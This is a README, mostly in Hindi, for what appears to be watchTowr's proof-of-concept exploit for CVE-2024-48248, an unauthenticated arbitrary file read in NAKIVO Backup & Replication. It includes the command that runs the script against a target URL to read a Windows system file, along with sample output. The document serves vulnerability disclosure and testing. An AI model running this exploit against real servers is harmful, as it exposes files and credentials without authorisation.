
CVE-2024-48248 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो NAKIVO बैकअप और प्रतिकृति समाधान में अनप्रमाणित मनमाना फ़ाइल पढ़ने को प्रदर्शित करता है। प्रभावित संस्करणों के परीक्षण के लिए Python स्क्रिप्ट शामिल है।
NAKIVO बैकअप और रेप्लिकेशन समाधान: बिना प्रमाणीकरण के मनमानी फ़ाइल रीड का प्रूफ ऑफ कॉन्सेप्ट
तकनीकी विवरण के लिए हमारा ब्लॉग पोस्ट देखें
python3 watchtowr-vs-nakivo-arbitrary-file-read-poc-CVE-2024-48248.py --url https://192.168.1.1:4443 --file "C:\\windows\\win.ini"
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchtowr-vs-nakivo-arbitrary-file-read-poc-CVE-2024-48248.py
(*) Nakivo Unauthenticated Arbitrary File Read (CVE-2024-48248) POC by watchTowr
- Sonny , watchTowr ([email protected])
CVEs: [CVE-2024-48248]
[*] Targeting https://192.168.1.1:4443
[*] Attempting to read file 'C:\windows\win.ini'
[*] File Contents:
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
यह स्क्रिप्ट CVE-2024-48248 के लिए एक प्रूफ ऑफ कॉन्सेप्ट है, जो NAKIVO बैकअप और रेप्लिकेशन समाधान को लक्षित करती है। अधिक विवरण हमारे [ब्लॉग पोस्ट] (https://labs.watchtowr.com/) में वर्णित हैं।
नवीनतम सुरक्षा शोध के लिए watchTowr Labs टीम को फॉलो करें